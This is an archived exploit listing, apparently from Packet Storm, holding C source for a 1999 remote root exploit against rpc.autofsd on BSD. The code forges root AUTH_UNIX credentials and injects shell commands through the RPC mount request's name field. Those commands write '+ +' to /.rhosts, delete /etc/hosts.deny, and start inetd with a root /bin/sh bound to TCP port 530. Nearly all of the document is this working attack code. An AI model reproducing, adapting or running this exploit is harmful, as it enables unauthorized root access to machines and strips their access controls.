rpc.autofsd remote root exploit for BSD. Attempts to put a root shell on tcp port 530.
e490c2f957124325787c9c8f4f673ad539a7d8f7ebe5f0c7a051a9e4fc192557// *** Synnergy Networks
// * Description:
//
// Remote exploit for rpc.autofsd on BSD. This will attempt to put a root shell
// on tcp port 530.
// * Author:
//
// guidob (guidob@synnergy.net)
// Synnergy Networks (c) 1999, http://www.synnergy.net
// * Greets:
//
// Synnergy Networks, LoU, Cindy
// * Comments:
//
// This will not work on all types and/or versions.
// *** Synnergy Networks
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpc/xdr.h>
#include <signal.h>
#define AUTOFS_PROG ((u_long)100099)
#define AUTOFS_VERS ((u_long)1)
#define AUTOFS_MOUNT ((u_long)1)
#define AT 8
#define A_MAXNAME 255
#define A_MAXOPTS 255
#define A_MAXPATH 1024
struct mntrequest {
char *name; /* name to be looked up */
char *map; /* map to use */
char *opts; /* default options */
char *path; /* mountpoint to use */
};
struct mntres {
int status; /* 0=OK, otherwise an errno from <sys/errno.h> */
};
bool_t xdr_mntrequest(XDR *xdrs,struct mntrequest *objp){
if (!xdr_string(xdrs, &objp->name, A_MAXNAME)) return (FALSE);
if (!xdr_string(xdrs, &objp->map, A_MAXNAME)) return (FALSE);
if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS)) return (FALSE);
if (!xdr_string(xdrs, &objp->path, A_MAXPATH)) return (FALSE);
return (TRUE);
}
void signal_handler(void) {
exit(0);
}
bool_t xdr_mntres(XDR *xdrs,struct mntres *objp){
if (!xdr_int(xdrs, &objp->status)) return (FALSE);
return (TRUE);
}
main(int argc, char **argv){
CLIENT *cl;
struct mntrequest mntreq;
struct mntres *res;
struct sockaddr_in target;
struct hostent *hp;
struct timeval tm;
char *host;
enum clnt_stat stat;
int sd;
signal(SIGALRM, signal_handler);
alarm(AT);
host=argv[1];
if ((target.sin_addr.s_addr = inet_addr(host)) == -1) {
if ((hp = gethostbyname(host)) == NULL) {
printf("%s: cannot resolve\n", host);
exit(1);
} else
target.sin_addr.s_addr = *(u_long *)hp->h_addr;
}
target.sin_family=AF_INET;
target.sin_port=0;
sd=RPC_ANYSOCK;
tm.tv_sec=8;
tm.tv_usec=0;
if((cl=clntudp_create(&target,AUTOFS_PROG,AUTOFS_VERS,tm,&sd))==NULL) {
clnt_pcreateerror("clnt_create");
exit(0);
}
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
tm.tv_sec = 25;
/* echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob
*/
mntreq.name=";echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo \"courier stream tcp nowait root /bin/sh sh -i\" > /tmp/bob;inetd /tmp/bob"; /* Tu mozna wstawic co sie chce */
mntreq.map="/bin/true";
mntreq.path="/hosts";
mntreq.opts="";
bzero((char *)&res, sizeof(res));
if ((stat = clnt_call(cl, AUTOFS_MOUNT, (xdrproc_t)xdr_mntrequest,&mntreq,
(xdrproc_t)xdr_mntres, &res, tm)) != RPC_SUCCESS) {
clnt_perror(cl, "clnt_call");
exit(1);
}
clnt_destroy(cl);
}
// EOF
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed